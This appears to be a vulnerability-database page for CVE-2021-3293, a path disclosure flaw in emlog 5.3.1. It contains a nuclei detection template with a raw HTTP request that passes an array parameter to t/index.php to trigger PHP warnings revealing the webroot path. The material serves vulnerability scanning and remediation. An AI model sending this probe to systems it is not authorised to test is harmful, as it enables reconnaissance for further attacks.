Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

emlog 5.3.1 Path Disclosure

🗓️ 28 Jun 2026 03:02:45Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 62 Views

emlog 5.3.1 Path Disclosure, server's file system exposure vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2021-3293
8 Feb 202118:39
circl
CNNVD		Emlog 路径遍历漏洞
8 Feb 202100:00
cnnvd
CNVD		emlog path traversal vulnerability (CNVD-2021-39975)
9 Feb 202100:00
cnvd
CVE		CVE-2021-3293
8 Feb 202114:17
cve
Cvelist		CVE-2021-3293
8 Feb 202114:17
cvelist
NVD		CVE-2021-3293
8 Feb 202115:15
nvd
Prion		Path traversal
8 Feb 202115:15
prion
Positive Technologies		PT-2021-19977 · Emlog · Emlog
8 Feb 202100:00
ptsecurity
RedhatCVE		CVE-2021-3293
22 May 202519:46
redhatcve
id: CVE-2021-3293

info:
  name: emlog 5.3.1 Path Disclosure
  author: h1ei1
  severity: medium
  description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.
  impact: |
    An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks.
  remediation: |
    Apply the latest patch or upgrade to a version that fixes the vulnerability.
  reference:
    - https://github.com/emlog/emlog/issues/62
    - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3293
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-3293
    cwe-id: CWE-22
    epss-score: 0.17436
    epss-percentile: 0.96746
    cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: emlog
    product: emlog
  tags: cve2021,cve,emlog,fpd,vuln

http:
  - raw:
      - |
        GET /t/index.php?action[]=aaaa HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<b>Warning</b>"
          - "on line"
          - "expects parameter"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204f7e2e42c4bda4690d0e82baf77659da0a92b48ba9850f358a4038617a2aae25022100dc789f2c5a515d0ce10e2c01ab6b1cf2a49fd6801de06aaf435bbd93c98b1471:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 25
CVSS 3.15.3
EPSS0.17436
cve-2021cveemlogfull path disclosure
62